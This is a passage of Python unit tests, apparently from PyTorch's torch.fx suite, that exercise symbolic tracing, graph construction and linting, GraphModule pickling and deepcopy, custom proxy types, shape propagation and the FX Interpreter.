instructions.append((target_to_name[target], arg_names, out_name))
elif n.op == 'output':
if output_node is not None:
raise RuntimeError('Multiple output nodes!')
output_node = n
else:
raise RuntimeError('Unsupported opcode ' + n.op)
interpreter = torch.classes._TorchScriptTesting._ElementwiseInterpreter()
# Load constants
for k, v in constants.items():
interpreter.add_constant(k, v)
# Specify names for positional input arguments
interpreter.set_input_names(fn_input_names)
# Load instructions
interpreter.set_instructions(instructions)
# Specify name for single output
assert isinstance(output_node.args[0], torch.fx.Node)
interpreter.set_output_name(output_node.args[0].name)
# ===== Stage 3: Create a wrapper GraphModule around the interpreter =====
class WrapperModule(torch.nn.Module):
def __init__(self, interpreter):
super().__init__()
self.interpreter = interpreter
wrapper = WrapperModule(interpreter)
# Create a graph that: 1) Takes function arguments 2) Invokes the interpreter
# 3) Returns the specified return value
# FIXME: The following code could be greatly simplified by symbolic_trace'ing
# the wrapper with a Tracer that considers the Wrapper instance a root
# module, however, I can't get `__call__` exposed on TorchBind classes
# without it messing up Python `hasattr` for some reason. More digging
# into CPython's implementation of hasattr is probably in order...
graph = torch.fx.Graph()
# Add placeholders for fn inputs
placeholder_nodes = []
for name in fn_input_names:
placeholder_nodes.append(graph.create_node('placeholder', name))
# Get the interpreter object
interpreter_node = graph.create_node('get_attr', 'interpreter')
# Add a node to call the interpreter instance
output_node = graph.create_node(
op='call_method', target='__call__', args=(interpreter_node, placeholder_nodes))
# Register output
graph.output(output_node)
graph.lint()
# Return final GraphModule!!!
return GraphModule(wrapper, graph)
# Lower GraphModule to C++ interpreter
lowered = lower_to_elementwise_interpreter(msm)
# Compare correctness with original module
x = torch.rand(3, 4)
ref_out = msm(x)
test_out = lowered(x)
torch.testing.assert_close(test_out, ref_out)
# Test TorchScript compilation
scripted_lowered = torch.jit.script(lowered)
script_out = scripted_lowered(x)
torch.testing.assert_close(script_out, ref_out)
# Test TorchScript ser/de
import_copy = self.getExportImportCopy(scripted_lowered)
imported_out = import_copy(x)
torch.testing.assert_close(imported_out, ref_out)
def test_reserved_getattr(self):
"""Ensure that we do not name any nodes with a reserved builtin like `getattr`"""
class M(torch.nn.Module):
def forward(self, a):
return a.foo.bar.baz
m = M()
m_g = symbolic_trace(m)
m_g.graph.lint()
for node in m_g.graph.nodes:
self.assertTrue(node.name != "getattr")
@unittest.skip("Hotfix for SEV remediation")
def test_trace_buffer_slice(self):
bs, d_hid = 10, 23
class ExampleCode(torch.nn.Module):
def __init__(self):
super().__init__()
self.mm_param = torch.nn.Parameter(torch.randn(d_hid, d_hid))
self.mm_param2 = torch.nn.Parameter(torch.randn(d_hid, d_hid))
self.lin = torch.nn.Linear(d_hid, d_hid)
self.register_buffer('buffer', torch.randn(bs + 100, d_hid))
def forward(self, x):
x = torch.mm(x, self.mm_param)
skip_connection = x
x = torch.relu(x)
x = torch.mm(x, self.mm_param) + self.buffer[:x.shape[0]]
x = self.lin(x)
x = torch.relu(x)
x = x + skip_connection
x = torch.mm(x, self.mm_param2)
x = self.lin(x)
return x
ec = ExampleCode()
traced = torch.fx.symbolic_trace(ec)
x = torch.randn(bs, d_hid)
torch.testing.assert_allclose(ec(x), traced(x))
def test_node_tagging(self):
class TaggingTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
n = super().create_node(kind, target, args, kwargs, name)
n.tag = 'foo'
return n
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = TaggingTracer().trace(m)
g.lint()
for n in g.nodes:
self.assertTrue(hasattr(n, 'tag'))
self.assertEqual(n.tag, 'foo')
def test_tensor_attribute(self):
class TensorAttribute(torch.nn.Module):
def __init__(self):
super().__init__()
self.tensor = torch.rand(3, 4)
def forward(self, x):
return torch.nn.functional.linear(x, self.tensor)
ta = TensorAttribute()
traced = symbolic_trace(ta)
traced(torch.rand(4, 4))
class WrapperForQualname(torch.nn.Module):
def __init__(self):
super().__init__()
self.ta = TensorAttribute()
def forward(self, x):
return torch.nn.functional.linear(x, self.ta.tensor)
wfq = WrapperForQualname()
traced2 = symbolic_trace(wfq)
traced2.graph.lint()
traced2(torch.rand(4, 4))
def test_tensor_attribute_coalesced(self):
def count_attrs(fx_module):
targets = set()
for node in fx_module.graph.nodes:
if node.op == 'get_attr':
targets.add(node.target)
return len(targets)
val = torch.tensor(5)
def f(x):
return x + val + val
traced = symbolic_trace(f)
traced.graph.lint()
self.assertEqual(count_attrs(traced), 1)
val2 = torch.tensor(5)
def f(x):
val = torch.tensor(5)
return x + val + val2
traced = symbolic_trace(f)
traced.graph.lint()
self.assertEqual(count_attrs(traced), 2)
def test_symbolic_trace_sequential(self):
class Simple(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
seq = torch.nn.Sequential(
Simple(),
Simple(),
Simple()
)
traced = symbolic_trace(seq)
traced.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(traced(x), seq(x))
def test_tensor_constant(self):
class ConstTensor(torch.nn.Module):
def forward(self, x):
return torch.nn.functional.linear(x, torch.zeros(3, 4))
ct = ConstTensor()
traced = symbolic_trace(ct)
traced.graph.lint()
traced(torch.rand(4, 4))
def test_pickle_graphmodule(self):
class Nested(torch.nn.Module):
def __init__(self):
super().__init__()
self.st = torch.nn.Linear(4, 4)
def forward(self, x):
return self.st(x)
n = Nested()
traced = symbolic_trace(n)
traced.graph.lint()
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(loaded(x), traced(x))
def test_pickle_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(loaded(x, y), gm(x, y))
def test_all_input_nodes(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.placeholder('x')
b : torch.fx.Node = graph.call_module('linear_mod', args=(a,))
c : torch.fx.Node = graph.get_attr('y_attr')
d : torch.fx.Node = graph.call_function(operator.add, args=(b, c))
e : torch.fx.Node = graph.call_function(torch.unsqueeze, args=(d, 0))
graph.output(e)
graph.lint()
self.assertEqual(b.all_input_nodes, [a])
self.assertEqual(c.all_input_nodes, [])
self.assertEqual(d.all_input_nodes, [b, c])
self.assertEqual(e.all_input_nodes, [d])
def test_deepcopy_graphmodule_with_transform(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
def transform(traced):
new_graph = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_value = new_graph.graph_copy(traced.graph, val_map)
relu_out = new_graph.create_node(
op='call_method', target='neg', args=(output_value,), kwargs={})
new_graph.output(relu_out)
return GraphModule(traced, new_graph)
transformed = transform(traced)
transformed.graph.lint()
copied = copy.deepcopy(transformed)
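# GraphModule creates a per-instance singleton subclass so each instance can own its
# generated forward(); a deepcopy therefore ends up with its own class object, which
# the id(type(...)) comparison below verifies.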
self.assertNotEqual(id(type(transformed)), id(type(copied)))
x = torch.randn(3, 4)
self.assertEqual(copied(x), transformed(x))
def test_deepcopy_with_submods_params(self):
class Bar(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
def forward(self, x):
return torch.relu(x) + self.param
class Baz(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.bar = Bar()
def forward(self, x):
return self.bar(x) - self.param
baz = Baz()
traced = symbolic_trace(baz)
traced.graph.lint()
copied = copy.deepcopy(traced)
copied.graph.lint()
def test_deepcopy_graph_with_tracer_cls(self):
class TestTracer(Tracer):
def is_leaf_module(self, module, name):
return True
g = Graph(tracer_cls=TestTracer)
x = g.placeholder("x")
g.output(x)
h = copy.deepcopy(g)
self.assertIsNotNone(h._tracer_cls)
self.assertTrue(g._tracer_cls == h._tracer_cls)
def test_unpack_list_better_error(self):
class SomeArgs(torch.nn.Module):
def forward(self, a, b):
return torch.rand(3, 4)
class UnpacksList(torch.nn.Module):
def __init__(self):
super().__init__()
self.sa = SomeArgs()
def forward(self, x : list):
return self.sa(*x)
ul = UnpacksList()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ul)
def test_unpack_dict_better_error(self):
class SomeKwargs(torch.nn.Module):
def forward(self, x=3, y=4):
return torch.rand(3, 4)
class UnpacksDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.sk = SomeKwargs()
def forward(self, x : dict):
return self.sk(**x)
ud = UnpacksDict()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ud)
def test_pretty_print_targets(self):
# Test that Graph pretty-print prints friendly name for targets
# in `operator` and `builtins`
class SomeMod(torch.nn.Module):
def forward(self, x):
return torch.add(x.foo + x.bar, 3.0)
traced = symbolic_trace(SomeMod())
graph_str = str(traced.graph)
self.assertIn('builtins.getattr', graph_str)
self.assertIn('operator.add', graph_str)
self.assertIn('torch.add', graph_str)
def test_pretty_print_node(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.param: torch.nn.Parameter = torch.nn.Parameter(
torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x: torch.Tensor, y: int = 2):
return self.linear(x[y] + self.param).clamp(min=0.0, max=1.0)
traced = symbolic_trace(M())
all_formatted = "\n".join([n.format_node() for n in traced.graph.nodes])
FileCheck().check("x").check("placeholder") \
.check("y").check("placeholder") \
.check("getitem").check("call_function") \
.check("param").check("get_attr") \
.check("add").check("call_function") \
.check("linear").check("call_module") \
.check("clamp").check("call_method") \
.run(all_formatted)
def test_script_tensor_constant(self):
# TorchScript seems to ignore attributes that start with `__`.
# We used to call anonymous Tensor values `__tensor_constant*`, but
# they were getting ignored by script. Now they're called
# `_tensor_constant*`
class IHaveATensorConstant(torch.nn.Module):
def forward(self, x):
return x + torch.rand(3, 4)
traced = torch.fx.symbolic_trace(IHaveATensorConstant())
torch.jit.script(traced)
def test_autowrap_functions(self):
class AutowrapFnTest(torch.nn.Module):
def forward(self, x):
return fx_int(x.shape[0] / 2)
class AutowrapFnTest2(torch.nn.Module):
def forward(self, x):
return fx_int(x.shape[0] / 2) + fx_int_x2(x.shape[0] / 2)
# Check function(s) are wrapped
# `int` would normally throw a TypeError as argument can't be `Proxy`
tracer = Tracer(autowrap_functions=(fx_int,))
graph = tracer.trace(AutowrapFnTest())
traced = GraphModule(tracer.root, graph, 'test')
tracer_2 = Tracer(autowrap_functions=(fx_int, fx_int_x2))
tracer_2.trace(AutowrapFnTest2())
# Test scriptability
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(4)), 2)
def test_tuple_no_subscript(self):
def foo(x : Tuple):
return x[0]
traced = torch.fx.symbolic_trace(foo)
x = (torch.randn(5, 3),)
torch.testing.assert_allclose(traced(x), x[0])
bio = io.BytesIO()
torch.save(traced, bio)
bio.seek(0)
loaded = torch.load(bio)
torch.testing.assert_allclose(loaded(x), x[0])
def test_torch_fx_len(self):
class FXLenTest(torch.nn.Module):
def forward(self, x):
return len(x)
traced = symbolic_trace(FXLenTest())
self.assertEqual(traced(torch.rand(3, 4)), 3)
# Test scriptability
scripted = torch.jit.script(FXLenTest())
self.assertEqual(scripted(torch.rand(3)), 3)
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(3)), 3)
# Test non-proxy len
class FXLenTest2(torch.nn.Module):
def __init__(self):
super().__init__()
self.l = [3, 4, 5]
def forward(self, x):
return x + len(self.l)
traced2 = symbolic_trace(FXLenTest2())
inp = torch.rand(3, 4)
self.assertEqual(traced2(inp), inp + 3.0)
self.assertIs(len, builtins.len)
def test_torch_fx_getattr(self):
class FXGetattrTest(torch.nn.Module):
def forward(self, x):
return getattr(x, 'nonexistent_attr', torch.Tensor([2, 3]))
traced = symbolic_trace(FXGetattrTest())
self.assertEqual(traced(torch.rand(3, 4)), torch.Tensor([2, 3]))
def test_sqrt(self):
class Sqrt1(torch.nn.Module):
def forward(self, x):
return sqrt(x.size(0))
class Sqrt2(torch.nn.Module):
def forward(self, x):
return math.sqrt(x.size(0))
class Sqrt3(torch.nn.Module):
def forward(self, x):
return x + math.sqrt(2) + sqrt(2)
self.checkGraphModule(Sqrt1(), [torch.zeros(8)])
self.checkGraphModule(Sqrt2(), [torch.zeros(8)])
self.checkGraphModule(Sqrt3(), [torch.zeros(8)])
self.assertIs(sqrt, _sqrt)
self.assertIs(math.sqrt, _sqrt)
def test_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
out = gm(input)
self.assertEqual(out, ref_out)
def test_torch_op_overloads(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.add.Tensor(a, a)
return b
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
out = gm(input)
self.assertEqual(out, ref_out)
for node in gm.graph.nodes:
if node.op == 'call_function':
assert isinstance(node.target, torch._ops.OpOverload)
assert node.target.__name__ == 'add.Tensor'
def test_pickle_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
self.assertEqual(loaded(input), gm(input))
def test_pretty_print(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
printed = str(traced)
assert 'SimpleTest()' in printed
assert 'torch.relu' in printed
def test_pretty_print_graph(self):
class KwargPrintTest(torch.nn.Module):
def forward(self, x):
return torch.squeeze(x + 3.0, dim=2)
st = KwargPrintTest()
traced = symbolic_trace(st)
traced.graph.lint()
stringed = str(traced.graph)
for s in ['args', 'kwargs', '#users']:
assert s in stringed
def test_custom_proxy_type(self):
class TensorPair:
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair(x : TensorPair, y : TensorPair):
s = x.add(y)
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
y = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
ref_out = use_tensor_pair(x, y)
traced = symbolic_trace(use_tensor_pair)
traced_out = traced(x, y)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_type_literal(self):
class TensorPair(metaclass=torch.fx.ProxyableClassMeta):
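# ProxyableClassMeta makes TensorPair construction traceable: if any constructor
# argument is a Proxy, the construction is recorded as a node in the graph instead
# of executing eagerly on Proxy values.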
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair_literal(x : TensorPair):
s = x.add(TensorPair(torch.zeros(5, 3), torch.zeros(5, 3)))
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
ref_out = use_tensor_pair_literal(x)
traced = symbolic_trace(use_tensor_pair_literal)
traced_out = traced(x)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_dynamic_value(self):
class TensorPair(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair_ctor(x : TensorPair, y : torch.Tensor):
s = x.add(TensorPair(y, y))
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
y = torch.randn(5, 3)
ref_out = use_tensor_pair_ctor(x, y)
traced = symbolic_trace(use_tensor_pair_ctor)
traced_out = traced(x, y)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_input_dependent_control_flow(self):
class ZeroTensor(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, inp):
if inp.sum() == 0:
self.is_zero = True
self.tensor = torch.tensor([])
else:
self.is_zero = False
self.tensor = inp
def add(self, other):
if self.is_zero:
return ZeroTensor(other.tensor)
elif other.is_zero:
return self
def use_zero_tensor(x : torch.Tensor, y : torch.Tensor):
return ZeroTensor(x + y)
x, y = torch.randn(5, 3), torch.randn(5, 3)
ref_out = use_zero_tensor(x, y)
traced = symbolic_trace(use_zero_tensor)
traced_out = traced(x, y)
self.assertEqual(traced_out.is_zero, ref_out.is_zero)
self.assertEqual(traced_out.tensor, ref_out.tensor)
def test_graph_fns(self):
g = Graph()
a = g.placeholder('a')
b = g.call_module('linear', (a,))
c = g.get_attr('bias')
d = g.call_method('add', (b, c))
e = g.call_function(torch.sin, (d,))
g.output(e)
mod = torch.nn.Module()
mod.linear = torch.nn.Linear(3, 4)
mod.bias = torch.rand(4)
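# The hand-built graph computes torch.sin(linear(a) + bias), resolved against the
# attributes of the owning module constructed above.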
gm = GraphModule(mod, g)
gm.graph.lint()
input = torch.rand(3)
r = gm(input)
ref = torch.sin(mod.linear(input) + mod.bias)
self.assertEqual(r, ref)
def test_remove_uses(self):
g : torch.fx.Graph = Graph()
x : torch.fx.Node = g.placeholder('x')
relu : torch.fx.Node = g.call_function(torch.relu, (x,))
neg : torch.fx.Node = g.call_function(torch.neg, (relu,))
g.output(neg)
neg.replace_all_uses_with(relu)
g.erase_node(neg)
self.assertTrue(neg not in relu.users)
def test_remove_uses_with_custom_filter(self):
g : torch.fx.Graph = Graph()
x : torch.fx.Node = g.placeholder('x')
relu : torch.fx.Node = g.call_function(torch.relu, (x,))
neg : torch.fx.Node = g.call_function(torch.neg, (relu,))
g.output(neg)
neg.replace_all_uses_with(relu, lambda x: x != neg)
self.assertTrue(neg in relu.users)
def test_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(3, 4)
symbolic_trace(eb)
def test_pickle_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(10, 3, mode='sum')
traced = symbolic_trace(eb)
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.LongTensor([0, 4])
self.assertEqual(loaded(input, offsets), traced(input, offsets))
def test_return_tuple(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
return (x, x + x)
original = M()
traced = symbolic_trace(original)
self.assertEqual(traced(torch.ones(1)), original.forward(torch.ones(1)))
def test_construct_root_dict(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
linear_mod : torch.nn.Module = torch.nn.Linear(3, 4)
add_param : torch.Tensor = torch.rand(3, 4)
gm : torch.fx.GraphModule = torch.fx.GraphModule(
{'foo.bar.baz': linear_mod, 'zip.zap.zam' : add_param}, graph)
gm.graph.lint()
assert 'self.foo.bar.baz' in gm.code
x : torch.Tensor = torch.rand(3, 3)
out : torch.Tensor = gm(x)
ref_out : torch.Tensor = linear_mod(x) + add_param
self.assertEqual(out, ref_out)
def test_symbolic_trace_assert(self):
class AssertsTensorShape(torch.nn.Module):
def forward(self, x):
torch._assert(x.shape[1] > 4, "assert_foobar")
return x
m = AssertsTensorShape()
# verify traceability
traced = symbolic_trace(m)
# verify assertion on traced model works correctly at runtime
traced(torch.rand(4, 5))
with self.assertRaisesRegex(AssertionError, "assert_foobar"):
traced(torch.rand(4, 3))
# verify the symbolically traced module is scriptable
ms = torch.jit.script(m)
with self.assertRaisesRegex(torch.jit.Error, "assert_foobar"):
ms(torch.rand(4, 3))
def test_fx_create_arg(self):
class CustomArgObject:
def __init__(self, x, y):
self.x = x
self.y = y
def __fx_create_arg__(self, tracer: torch.fx.Tracer):
return tracer.create_node(
"call_function",
CustomArgObject,
args=(
tracer.create_arg(self.x),
tracer.create_arg(self.y),
),
kwargs={},
)
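# __fx_create_arg__ lets a custom type describe how it should be lowered into graph IR
# when it is passed to a leaf call: here the object is rebuilt via a call_function node
# whose args are the traced x and y.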
class HasCustomArgObjectWhenLeaf(torch.nn.Module):
def forward(self, o: CustomArgObject):
# Not normally traceable; good reason to make
# this module a leaf.
for x in o.x:
o.y += x
return o.y
class Root(torch.nn.Module):
def __init__(self):
super().__init__()
self.inner = HasCustomArgObjectWhenLeaf()
def forward(self, x, y):
o = CustomArgObject(x, y)
return self.inner(o)
class CreateArgTracer(torch.fx.Tracer):
def is_leaf_module(self, m, module_qualified_name):
return type(m) is HasCustomArgObjectWhenLeaf
m = Root()
graph = CreateArgTracer().trace(m)
gm = torch.fx.GraphModule(m, graph)
assert "CustomArgObject(" in gm.code
def test_trace_fn_constant(self):
some_constant = torch.rand(3, 4)
def add_const(x):
return some_constant + x
traced = symbolic_trace(add_const)
input = torch.rand(3, 4)
self.assertEqual(traced(input), add_const(input))
def test_copy_no_remap(self):
traced = symbolic_trace(SimpleTest())
g = traced.graph
copied = torch.fx.Graph()
for node in g.nodes:
copied.node_copy(node)
with self.assertRaisesRegex(RuntimeError, 'does not belong to this Graph'):
copied.lint()
def test_wrong_topo(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
nodes = list(graph.nodes)
nodes[3].append(nodes[2])
with self.assertRaisesRegex(RuntimeError, 'was used before it has been defined'):
graph.lint()
def test_wrong_target_type(self):
graph : torch.fx.Graph = torch.fx.Graph()
with self.assertRaises(ValueError):
n = torch.fx.Node(graph=graph, name='foo', op='call_function', target='foo',
args=(), kwargs={})
def test_example_shape_prop(self):
class TestCase(torch.nn.Module):
def __init__(self):
super().__init__()
self.attr = torch.randn(3, 4)
self.submod = torch.nn.Linear(4, 4)
def forward(self, x):
return torch.neg(self.submod(x.relu() + self.attr))
tc = TestCase()
tc_traced = symbolic_trace(tc)
ref_out = tc_traced(torch.rand(3, 4))
shape_prop.ShapeProp(tc_traced).propagate(torch.rand(3, 4))
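# ShapeProp interprets the graph with the example input and records per-node tensor
# metadata (shape, dtype, stride, memory_format, ...) under node.meta['tensor_meta'].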
# Make sure we're testing all opcodes
opcodes = set()
output_shape : Optional[torch.Size] = None
output_stride : Optional[Tuple[int, ...]] = None
for node in tc_traced.graph.nodes:
opcodes.add(node.op)
if node.op == 'output':
output_shape = node.args[0].meta['tensor_meta'].shape
output_stride = node.args[0].meta['tensor_meta'].stride
self.assertEqual(opcodes, set(['placeholder', 'get_attr', 'call_function', 'call_method',
'call_module', 'output']))
# Test shape propagation and make sure results match actual
self.assertEqual(output_shape, ref_out.shape)
self.assertEqual(output_stride, ref_out.stride())
def test_shape_prop_layout(self):
class ConvTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv2d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
# contiguous layout
test_mod = ConvTest()
traced = symbolic_trace(test_mod)
x = torch.randn(5, 5, 224, 224)
shape_prop.ShapeProp(traced).propagate(x)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced.graph.nodes))
x_channels_last = x.contiguous(memory_format=torch.channels_last)
traced.to(memory_format=torch.channels_last)
shape_prop.ShapeProp(traced).propagate(x_channels_last)
for node in traced.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last)
def test_shape_prop_aggregate(self):
class ReturnTwo(torch.nn.Module):
def forward(self, x):
return (3, torch.sum(x))
class UnderTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.rt = ReturnTwo()
def forward(self, x):
return self.rt(x)
ut = UnderTest()
class RTTracer(torch.fx.Tracer):
def is_leaf_module(self, m, module_qualified_name):
return type(m) is ReturnTwo
graph = RTTracer().trace(ut)
mod = torch.fx.GraphModule(ut, graph)
shape_prop.ShapeProp(mod).propagate(torch.rand(3, 4))
for node in mod.graph.nodes:
if node.op == 'call_module':
assert 'tensor_meta' in node.meta
tensor_meta = node.meta['tensor_meta']
assert tensor_meta[0] == 3
assert tensor_meta[1].shape == torch.Size([])
def test_shape_prop_layout_3d(self):
class ConvTest3d(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv3d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
test_mod_3d = ConvTest3d()
traced_3d = symbolic_trace(test_mod_3d)
x_3d = torch.randn(5, 5, 224, 224, 15)
shape_prop.ShapeProp(traced_3d).propagate(x_3d)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced_3d.graph.nodes))
x_channels_last_3d = x_3d.contiguous(memory_format=torch.channels_last_3d)
traced_3d.to(memory_format=torch.channels_last_3d)
shape_prop.ShapeProp(traced_3d).propagate(x_channels_last_3d)
for node in traced_3d.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last_3d)
def test_interpreter(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
interpreter = Interpreter(gm)
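# Interpreter executes the GraphModule's graph node by node in Python, so its result
# should match both the GraphModule and the original module.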
input = torch.randn(3, 4)
self.assertEqual(interpreter.run(input), gm(input))
self.assertEqual(interpreter.run(input), m(input))
def test_interpreter_run_node_override(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
class RunNodeInterpreter(Interpreter):
def __init__(self, module):
super().__init__(module)
def run_node(self, n : Node) -> Any:
result = super().run_node(n)
n.cached_value = result
return result
input = torch.randn(3, 4)
RunNodeInterpreter(gm).run(input)
for node in gm.graph.nodes:
assert hasattr(node, 'cached_value')
def test_interpreter_onthefly_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
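# Overriding call_function/call_method swaps sigmoid and neg at execution time without
# touching the traced graph, so running the interpreter yields torch.neg(x).sigmoid().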
class NegSigmSwapInterpreter(Interpreter):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(target, args, kwargs)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(target, args, kwargs)
input = torch.randn(3, 4)
result = NegSigmSwapInterpreter(gm).run(input)
self.assertEqual(result, torch.neg(input).sigmoid())
def test_interpreter_partial_eval(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
gm = torch.fx.symbolic_trace(MyModule())
interp = Interpreter(gm)
env = {}
for node in gm.graph.nodes:
if node.op == 'call_module' and node.target == 'linear':
env[node] = torch.arange(0, 12, 1).reshape(3, 4) - 6.0
break
assert len(env) == 1
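# A node already present in initial_env is short-circuited: the interpreter uses the
# supplied tensor instead of executing the linear call, so the result is just that
# tensor clamped to [0, 1].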
x = torch.randn(3, 4)
result = interp.run(x, initial_env=env)
self.assertEqual(result, (torch.arange(0, 12, 1).reshape(3, 4) - 6.0).clamp(0.0, 1.0))
def test_interpreter_star_args(self):
def with_star_args(x, *args):
return x + args[0]
gm = torch.fx.symbolic_trace(with_star_args)
interp = Interpreter(gm)
result = interp.run(torch.ones(3, 4), torch.ones(3, 4), torch.rand(3, 4))
self.assertEqual(result, torch.ones(3, 4) * 2.0)
@skipIfNoTorchVision
def test_interpreter_noop_resnet18(self):
rn18 = torchvision_models.resnet18()
transformed = torch.fx.Transformer(symbolic_trace(rn18)).transform()
inp = torch.randn(5, 3, 224, 224)
self.assertEqual(transformed(inp), rn18(inp))
@skipIfNoTorchVision
def test_interpreter_gc_values(self):
rn18 = torchvision_models.resnet18()
interp = Interpreter(symbolic_trace(rn18))
inp = torch.rand(5, 3, 224, 224)
out = interp.run(inp)
